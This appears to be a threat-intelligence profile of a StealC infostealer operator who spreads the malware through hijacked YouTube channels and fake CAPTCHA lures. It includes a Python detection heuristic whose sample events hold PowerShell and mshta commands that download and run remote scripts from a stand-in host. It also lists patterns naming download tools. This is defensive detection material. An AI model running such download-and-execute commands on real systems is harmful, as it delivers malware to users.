YouTubeTA
YouTubeTA (short for "YouTube Threat Actor") is a StealC malware-as-a-service customer/operator identified by CyberArk, which gained visibility into the operator's activity by exploiting an XSS vulnerability in the StealC web control panel. The actor used StealC throughout 2025 and relied extensively on YouTube to distribute the infostealer, advertising cracked versions of Adobe Photoshop and Adobe After Effects. Reporting indicates the actor likely hijacked older legitimate YouTube channels using compromised credentials and planted malicious links, creating a self-perpetuating distribution mechanism in which creator credentials stolen by the stealer feed further channel hijacks. Observed StealC build IDs associated with this operator included "YouTube," "YouTube2," and "YouTubeNew."

Panel data indicated the operation maintained more than 5,000 victim logs containing roughly 390,000 stolen passwords and more than 30 million stolen cookies. The actor's panel configuration included markers for studio.youtube.com credentials, consistent with deliberate targeting of YouTube creator accounts. Victim screenshots also showed use of ClickFix-like social engineering (fake CAPTCHA or verification pages that instruct the victim to paste a command into the Run dialog).

CyberArk assessed YouTubeTA was likely a single operator because the panel showed only one admin user and session fingerprinting was consistent across observations. Fingerprinting indicated use of an Apple Pro/M3-based device, English and Russian language support, and a GMT+0300 time zone. In mid-July 2025, the operator reportedly accessed the panel without a VPN, exposing an IP address associated with the Ukrainian ISP TRK Cable TV.

The reporting supports describing YouTubeTA as an Eastern European, likely Ukrainian-linked, cybercriminal operator, but does not establish any nation-state affiliation.
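The ClickFix-style lure noted above leaves a recognizable host trace: because the victim pastes the command into the Run dialog themselves, an interactive parent such as explorer.exe spawns a script interpreter that fetches a remote payload, usually with a hidden window and often with an "I am not a robot" string appended as a comment. The following detection heuristic is an added example for that technique, not code from CyberArk's reporting or from this profile; the event field names, signal weights, threshold, and sample events are all constructed assumptions, and it goes beyond the page by also decoding PowerShell -EncodedCommand arguments so the download logic hidden inside is scored too.

```python
"""ClickFix-style process-creation heuristic.

Added example, not code from the cited reporting or from this profile.
A ClickFix lure tells the victim to paste a command into the Win+R Run
box, so the host record is a user-driven parent (explorer.exe) spawning
a script interpreter that fetches a remote payload, usually with a hidden
window. Field names, weights, threshold and sample events are assumptions.
"""
import base64
import re
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
USER_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# -EncodedCommand takes base64 of UTF-16LE text; it is decoded below so the
# download logic hidden inside can be scored like a plain command line.
ENC_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

SIGNALS = [  # (label, pattern, weight): all heuristic choices
    ("remote_url", re.compile(r"https?://[^\s'\"]+", re.I), 3),
    ("download_cmd", re.compile(
        r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|certutil|"
        r"bitsadmin|downloadstring|downloadfile)\b", re.I), 3),
    ("hidden_window", re.compile(
        r"-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I), 2),
    ("exec_policy", re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 2),
    ("encoded_cmd", ENC_RX, 3),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I), 3),
    ("captcha_comment", re.compile(
        r"#.*(captcha|human|verif|not a robot)", re.I), 2),
]
THRESHOLD = 5


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent
    command_line: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline):
    """Append the decoded body of a -EncodedCommand argument, if present."""
    m = ENC_RX.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def score_event(ev):
    """Return (score, matched signal labels) for one process-creation event."""
    if basename(ev.image) not in INTERPRETERS:
        return 0, []
    score, hits = 0, []
    if basename(ev.parent_image) in USER_PARENTS:
        score, hits = 2, ["user_parent"]
    cmd = expand_encoded(ev.command_line)
    for label, rx, weight in SIGNALS:
        if rx.search(cmd):
            score += weight
            hits.append(label)
    return score, hits


def detect(events, threshold=THRESHOLD):
    """Return (index, score, signals) for every event at or above threshold."""
    out = []
    for i, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= threshold:
            out.append((i, score, hits))
    return out


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
ENC = base64.b64encode(
    "(New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')|iex"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(PS, EXPLORER, 'powershell -w hidden -ep bypass -c "iwr '
                 'https://example.invalid/x.ps1 | iex" # I am not a robot - '
                 'reCAPTCHA Verification ID: 4812'),
    ProcessEvent("C:\\Windows\\System32\\mshta.exe", EXPLORER,
                 "mshta.exe https://example.invalid/v.hta"),
    ProcessEvent(PS, "C:\\Windows\\System32\\services.exe",  # benign admin script
                 "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                 "-File C:\\ProgramData\\Agent\\inventory.ps1"),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe", EXPLORER, "cmd.exe /c dir"),
    ProcessEvent(PS, EXPLORER, "powershell -nop -w hidden -enc " + ENC),
]

if __name__ == "__main__":
    for idx, score, hits in detect(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} signals={hits}")
```

The service-launched inventory script scores below the threshold even though it uses -NoProfile and -ExecutionPolicy Bypass, because no interactive parent and no remote fetch are involved; in production the weights and parent list would be tuned against the environment's own baseline rather than kept as the guesses used here.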
Tradecraft
10 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
1 malware family attributed to this actor across reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
A StealC customer/affiliate that distributes the stealer via YouTube-based lures advertising cracked software such as Adobe Photoshop and Adobe After Effects.
A StealC MaaS customer that distributes StealC via YouTube by promoting cracked software (e.g., Adobe Photoshop/After Effects), likely hijacking legitimate YouTube accounts to create a self-propagating distribution loop; also uses fake CAPTCHA lures to deliver the stealer.
A StealC operator involved in credential theft and cookie theft, apparently using compromised YouTube channels and stolen studio.youtube.com credentials to distribute StealC and expand malware distribution.
A StealC MaaS customer/operator running malware distribution campaigns via hijacked YouTube channels, using compromised credentials and malicious links to infect victims and steal credentials/cookies at scale.